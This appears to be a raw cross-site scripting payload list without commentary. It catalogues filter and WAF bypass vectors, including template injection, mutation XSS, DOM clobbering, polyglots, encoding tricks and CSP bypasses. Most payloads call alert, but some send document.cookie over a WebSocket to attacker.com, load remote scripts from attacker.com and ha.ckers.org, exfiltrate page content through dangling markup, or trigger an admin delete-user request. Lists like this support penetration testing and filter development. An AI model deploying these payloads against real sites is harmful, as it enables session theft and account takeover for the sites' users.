&lt;XML SRC=\"xsstest.xml\" ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;HTML&gt;&lt;BODY&gt;
&lt;?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"&gt;
&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
&lt;t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
&lt;/BODY&gt;&lt;/HTML&gt;
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML>
&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

# SSI/PHP injection
&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'\"--&gt;
&lt;? echo('&lt;SCR)';
echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;

# CGI redirect
&lt;IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\"&gt;
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

# Eval-based XSS
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);

# URL encoding variations
&lt;A HREF=\"http://66.102.7.147/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://1113982867/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://0x42.0x0000066.0x7.0x93/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://0102.0146.0007.00000223/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"htt p://6 6.000146.0x7.147/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"//www.google.com/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://ha.ckers.org@google\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://google:ha.ckers.org\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://google.com/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://www.google.com./\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"javascript:document.location='http://www.google.com/'\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http://www.gohttp://www.google.com/ogle.com/\"&gt;XSS&lt;/A&gt;

# Special processing directives
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(123)</script>">
<%<!--'%><script>alert(1);</script -->

# SVG/HTML nesting XSS
<svg></svg></iframe>

# Modern XSS vectors and WAF bypasses

# AngularJS template injection
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$parent.constructor('alert(1)')()}}
<div ng-app ng-csp><div ng-controller="test">{{$eval.constructor('alert(1)')()}}</div></div>

# VueJS template injection
{{constructor.constructor('alert(1)')()}}
{{_c.constructor('alert(1)')()}}
<div v-html="'<img src=x onerror=alert(1)>'"></div>

# React JSX injection
<img src=x onerror={alert(1)} />
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}} />

# Mutation XSS (mXSS)
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<listing>&lt;img src=x onerror=alert(1)&gt;</listing>
<style><img src=x onerror=alert(1)></style>

# DOM clobbering
<form id=test><input id=test2></form><form id=test2><input id=test></form>
<img name=alert id=alert src=x onerror=alert(1)>
<form name=test><input id=attributes></form>

# Polyglot XSS
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

# HTML5 new tags
<details open ontoggle=alert(1)>
<details open ontoggle="alert(1)">
<marquee onstart=alert(1)>
<meter onmouseover=alert(1)>0</meter>
<progress value=0 max=100 onmouseover=alert(1)>
<dialog open onclose=alert(1)>
<keygen onfocus=alert(1)>

# WebSocket XSS
<script>ws=new WebSocket('ws://attacker.com');ws.send(document.cookie);</script>

# postMessage XSS
<script>parent.postMessage('<img src=x onerror=alert(1)>','*')</script>
<iframe src="javascript:parent.postMessage('<img src=x onerror=alert(1)>','*')">

# Web Worker XSS
<script>w=new Worker('data:text/javascript,postMessage(document.cookie)');</script>

# Service Worker XSS
<script>navigator.serviceWorker.register('data:text/javascript,alert(1)')</script>

# CSS-based XSS
<style>@import'data:text/css,body{background:url(javascript:alert(1))}';</style>
<style>*{background:url('javascript:alert(1)')}</style>
<link rel=stylesheet href='data:text/css,*{x:expression(alert(1))}'>

# XML namespace XSS
<html xmlns:xss>
<?import namespace="xss" implementation="http://attacker.com/xss.htc"?>
<xss:xss>test</xss:xss>

# XSLT XSS
<xsl:value-of select="system-property('xsl:vendor')"/>
<xsl:template match="/">
<script>alert(1)</script>
</xsl:template>

# Unicode bypass
\u003cscript\u003ealert(1)\u003c/script\u003e
<script>alert\u0028 1\u0029</script>
\x3cscript\x3ealert(1)\x3c/script\x3e

# Octal encoding
\74\163\143\162\151\160\164\76alert(1)\74\57\163\143\162\151\160\164\76

# Hex encoding
\x3c\x73\x63\x72\x69\x70\x74\x3ealert(1)\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e

# HTML entity encoding
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;

# Double encoding
%253Cscript%253Ealert(1)%253C%2Fscript%253E

# UTF-7 encoding
+ADw-script+AD4-alert(1)+ADw-/script+AD4-

# WAF bypass with comments
<scr<!---->ipt>alert(1)</scr<!---->ipt>
<scr<script>ipt>alert(1)</scr</script>ipt>

# WAF bypass with null bytes
<script\x00>alert(1)</script>
<scri\x00pt>alert(1)</scri\x00pt>

# WAF bypass with newlines
<script
>alert(1)</script>
<scri\npt>alert(1)</scri\npt>

# Obfuscated JavaScript
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>Function('alert(1)')()</script>
<script>[1].map(alert)</script>
<script>top[/al/.source+/ert/.source](1)</script>

# JSFuck
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()

# Content Security Policy bypass
<link rel="prefetch" href="javascript:alert(1)">
<link rel="prerender" href="javascript:alert(1)">
<base href="javascript:alert(1)//">

# srcdoc iframe XSS
<iframe srcdoc="<script>alert(1)</script>">
<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">

# HTML imports XSS
<link rel="import" href="data:text/html,<script>alert(1)</script>">

# Script gadgets
<div id=x tabindex=1 onfocus=alert(1)></div><input value=clickme>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<video poster=javascript:alert(1)//></video>
<body onload=alert(1)>
<body oninput=alert(1)><input autofocus>

# RPO (Relative Path Overwrite)
<script src="//attacker.com/poc.js"></script>
<script src="/poc.js"></script>

# Dangling markup injection
"><img src='//attacker.com?
'><img src='//attacker.com?

# AngularJS 1.6+ sandbox bypass
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}

# Template literals
<script>eval(`alert\x281\x29`)</script>
<script>Function`x${alert`1`}x`</script>

# Arrow functions
<script>_=alert,_(1)</script>
<script>(alert)(1)</script>
<script>[alert][0](1)</script>

# ES6 features
<script>({alert}={alert:alert},{alert}(1))</script>
<script>[a,b,c,...alert]=1</script>

# Event handlers with spaces
< img src=x onerror=alert(1)>
<img src=x onerror= alert(1)>
<img src=x onerror = alert(1)>

# Without quotes
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert(document.domain)>

# Protocol-relative URL
<script src=//attacker.com/xss.js></script>
<img src=//attacker.com/x onerror=alert(1)>

# Meta refresh XSS
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">

# Form action XSS
<form action="javascript:alert(1)"><input type=submit></form>
<form><button formaction="javascript:alert(1)">Click</button></form>

# Object data XSS
<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">

# Embed src XSS
<embed src="javascript:alert(1)">
<embed src="data:text/html,<script>alert(1)</script>">

# Applet XSS
<applet code="java.lang.Runtime">

# Audio/Video XSS
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>

# Picture XSS
<picture><source srcset="javascript:alert(1)"></picture>

# Track XSS
<video><track default src="javascript:alert(1)"></video>

# Shadow DOM XSS
<div><template shadowroot=open><script>alert(1)</script></template></div>

# Custom elements XSS
<custom-element onconnected=alert(1)>

# Web Components XSS
<x-element><script>alert(1)</script></x-element>